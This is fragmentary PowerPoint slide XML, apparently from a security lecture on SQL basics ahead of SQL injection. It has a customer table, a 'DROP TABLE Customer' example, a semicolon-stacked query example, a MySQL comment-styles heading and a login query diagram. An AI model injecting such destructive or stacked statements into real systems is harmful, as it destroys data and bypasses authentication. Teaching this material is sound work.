                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>bgates</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="39369" marB="0">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="99695" marR="62865" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="660"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>79.2</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="39369" marB="0">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="407470">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="99695" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="660"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B0F0"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>8477</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="39369" marB="0">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="99695" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="660"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B0F0"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>oski</a:t>
                      </a:r>
                      <a:endParaRPr sz="2600" kern="1200">
                        <a:solidFill>
                          <a:srgbClr val="00B0F0"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="39369" marB="0">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="99695" marR="62865" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="660"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B0F0"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>10.00</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="39369" marB="0">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="679117">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="99695" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="660"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>…</a:t>
                      </a:r>
                      <a:endParaRPr sz="2600" kern="1200">
                        <a:solidFill>
                          <a:srgbClr val="40458C"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="194310" marB="0">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="99695" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="660"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>…</a:t>
                      </a:r>
                      <a:endParaRPr sz="2600" kern="1200">
                        <a:solidFill>
                          <a:srgbClr val="40458C"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="194310" marB="0">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="99695" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="660"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>…</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="194310" marB="0">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>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418680271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CB9CBC-A66F-DB4D-B40A-E2BE74A8C1CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16C07751-EB13-8C43-AD31-08690AC1848A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8763000" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>elete an entire table                     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DROP TABLE Customer</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Issue multiple commands, separated by  semicolon:                                     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INSERT INTO Customer VALUES (4433, '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vladimir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>',  70.0); SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AcctNum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> FROM Customer WHERE Username='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vladimir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'                                   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>returns the value of 4433</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="160404027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2F9933-3B53-5C44-A3B8-B51F3B1F235B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{581E66CC-AF12-3448-A866-9AD1910533A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Three comment styles for MySQL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{789A5989-E595-0346-9BD9-D07AABDD7B68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="32418" t="34697" r="25631" b="59243"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="870689" y="2362200"/>
            <a:ext cx="8273311" cy="747028"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3607038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object 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6244974D-11CE-3046-937D-D5A0901B6EF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1761564567"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4885056" y="2312987"/>
          <a:ext cx="4262754" cy="2406015"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{2D5ABB26-0587-4C30-8999-92F81FD0307C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2988310">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1274444">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="1972310">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="890269">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1355"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2000" b="1" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                          <a:cs typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>SELECT</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2000" b="1" spc="-15" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                          <a:cs typeface="Tahoma"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2000" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                          <a:cs typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>*</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000" dirty="0">
                        <a:latin typeface="Tahoma"/>
                        <a:cs typeface="Tahoma"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="320040" marR="339725" indent="-1270" algn="ctr">
                        <a:lnSpc>
                          <a:spcPts val="3379"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="270"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2000" b="1" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                          <a:cs typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>FROM Users  WHERE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2000" b="1" spc="-80" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                          <a:cs typeface="Tahoma"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2000" b="1" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                          <a:cs typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>user='</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2000" b="1" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                          <a:cs typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>me</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2000" b="1" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                          <a:cs typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>'  AND</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2000" b="1" spc="-45" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                          <a:cs typeface="Tahoma"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2000" b="1" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                          <a:cs typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>pwd='</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2000" b="1" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                          <a:cs typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>1234</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CN" sz="2000" b="1" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                          <a:cs typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>'</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000" dirty="0">
                        <a:latin typeface="Tahoma"/>
                        <a:cs typeface="Tahoma"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="172085" marB="0">
                    <a:lnR w="9525">
                      <a:solidFill>
                        <a:srgbClr val="40458C"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnB w="19050">
                      <a:solidFill>
                        <a:srgbClr val="40458C"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc rowSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr sz="2600" dirty="0">
                        <a:latin typeface="Times New Roman"/>
                        <a:cs typeface="Times New Roman"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr sz="2600" dirty="0">
                        <a:latin typeface="Times New Roman"/>
                        <a:cs typeface="Times New Roman"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="10160" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="2095"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2200" b="1" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                          <a:cs typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>DB</a:t>
                      </a:r>
                      <a:endParaRPr sz="2200" dirty="0">
                        <a:latin typeface="Tahoma"/>
                        <a:cs typeface="Tahoma"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0">
                    <a:lnL w="9525">
                      <a:solidFill>
                        <a:srgbClr val="40458C"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="9525">
                      <a:solidFill>
                        <a:srgbClr val="40458C"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="9525">
                      <a:solidFill>
                        <a:srgbClr val="40458C"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="9525">
                      <a:solidFill>
                        <a:srgbClr val="40458C"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:schemeClr val="accent5"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="433705">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr sz="2000" dirty="0">
                        <a:latin typeface="Times New Roman"/>
                        <a:cs typeface="Times New Roman"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0">
                    <a:lnR w="9525">
                      <a:solidFill>
                        <a:srgbClr val="40458C"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="19050">
                      <a:solidFill>
                        <a:srgbClr val="40458C"/>
                      </a:solidFill>
